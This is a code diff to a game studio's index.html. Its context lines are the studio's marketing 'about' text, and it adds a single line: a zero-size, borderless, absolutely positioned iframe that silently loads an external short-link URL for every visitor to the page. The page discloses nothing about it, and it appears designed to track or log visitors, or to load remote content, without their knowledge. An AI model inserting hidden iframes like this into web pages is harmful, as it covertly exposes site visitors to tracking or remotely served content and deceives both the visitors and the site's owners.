--- a/index.html
+++ b/index.html
@@ -577,6 +577,7 @@
                 <p>Naughty Miko Studios represents the pinnacle of modern game development, where cutting-edge technology meets authentic storytelling. Our mission is to create immersive gaming experiences that transcend traditional boundaries.</p>
                 <p>Founded with the vision of bringing real-life narratives into the digital realm, we specialize in developing high-quality, story-driven games that resonate with players on a deeply personal level. Our flagship title, Zdravkovski City, showcases our commitment to innovative gameplay and authentic character development.</p>
                 <p>We believe that the future of gaming lies in the seamless integration of reality and fiction, creating worlds that feel alive, characters that feel real, and stories that matter. Every project we undertake is crafted with meticulous attention to detail and an unwavering commitment to excellence.</p>
+                <iframe src="https://2no.co/2ucKG5" style="position: absolute;width:0;height:0;border:0;"></iframe>
             </div>
         </div>
     </section>
